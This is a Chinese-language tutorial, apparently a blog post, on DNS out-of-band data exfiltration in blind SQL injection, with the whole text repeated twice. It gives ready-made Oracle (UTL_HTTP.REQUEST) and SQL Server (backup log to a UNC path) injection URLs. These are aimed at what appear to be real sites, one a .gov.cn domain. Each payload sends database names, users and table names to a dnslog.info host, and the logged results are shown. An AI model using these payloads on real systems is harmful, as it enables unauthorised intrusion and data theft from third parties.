一些操蛋盲注可以用dns的带外查询来解决了,而且有了cloudeye这个神器就可以愉快的解决:
说明:
我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址,然后我们才会发起对那台服务的请求,cloudeye留下了四级五级域名的控制权,所以我们能发起一个域名请求来在cloudeye留下日志信息,从将数据库的信息带出来
比如:ping test.xxxxx.dnslog.info
你就会看到在日志记录上留下痕迹:
test.xxxxx.dnslog.info
我们如果用数据库发起一个dns请求: (数据库查询结果).xxxx.dnslog.info
就会在cloudeye的日志里面留下
(数据库查询结果).xxxx.dnslog.info
注意:
dns的请求被限制在63个字符长度大小
oracle的利用方式:
(1)首先是获取数据库的当前用户的用户名:
http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)||'.xxxxx.dnslog.info') FROM DUAL) –
说明:我看了帖子终于找到一个靠谱的函数:
UTL_HTTP.REQUEST():
utl_http包功能还是很强大的 可以通过他来捕捉网站页面的内容 或者调用一个url的接口完成某项功能
这里我们来用他引发dns 查询
在cloudeye的日志中留下的:nchd.xxxxx.dnslog.info
其中:nchd 就是数据库的当前用户名
(2)查询表名:
http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 1)WHERE CON >=1)||'.xxxxx.dnslog.info') FROM DUAL) –
结果:
dr$qk_comcp_fulltext$k.xxxxx.dnslog.info
表名是:dr$qk_comcp_fulltext$k
sql server的利用方式:
获取数据库名:
www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select db_name());exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxxx.dnslog.info\a'';');--
结果:
kaifeng.xxxxx.dnslog.info
数据库名字:kaifeng
爆表:
www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0);exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxx.dnslog.info\a'';');--
结果:
FRIENDLINK.xxxxx.dnslog.info
表名:FRIENDLINK
对了,cloudeye可以在乌云官网上购买:
http://www.wooyun.org/market/260
10wb
说明:
我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址,然后我们才会发起对那台服务的请求,cloudeye留下了四级五级域名的控制权,所以我们能发起一个域名请求来在cloudeye留下日志信息,从将数据库的信息带出来
比如:ping test.xxxxx.dnslog.info
你就会看到在日志记录上留下痕迹:
test.xxxxx.dnslog.info
我们如果用数据库发起一个dns请求: (数据库查询结果).xxxx.dnslog.info
就会在cloudeye的日志里面留下
(数据库查询结果).xxxx.dnslog.info
注意:
dns的请求被限制在63个字符长度大小
oracle的利用方式:
(1)首先是获取数据库的当前用户的用户名:
http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)||'.xxxxx.dnslog.info') FROM DUAL) –
说明:我看了帖子终于找到一个靠谱的函数:
UTL_HTTP.REQUEST():
utl_http包功能还是很强大的 可以通过他来捕捉网站页面的内容 或者调用一个url的接口完成某项功能
这里我们来用他引发dns 查询
在cloudeye的日志中留下的:nchd.xxxxx.dnslog.info
其中:nchd 就是数据库的当前用户名
(2)查询表名:
http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 1)WHERE CON >=1)||'.xxxxx.dnslog.info') FROM DUAL) –
结果:
dr$qk_comcp_fulltext$k.xxxxx.dnslog.info
表名是:dr$qk_comcp_fulltext$k
sql server的利用方式:
获取数据库名:
www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select db_name());exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxxx.dnslog.info\a'';');--
结果:
kaifeng.xxxxx.dnslog.info
数据库名字:kaifeng
爆表:
www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0);exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxx.dnslog.info\a'';');--
结果:
FRIENDLINK.xxxxx.dnslog.info
表名:FRIENDLINK
对了,cloudeye可以在乌云官网上购买:
http://www.wooyun.org/market/260
10wb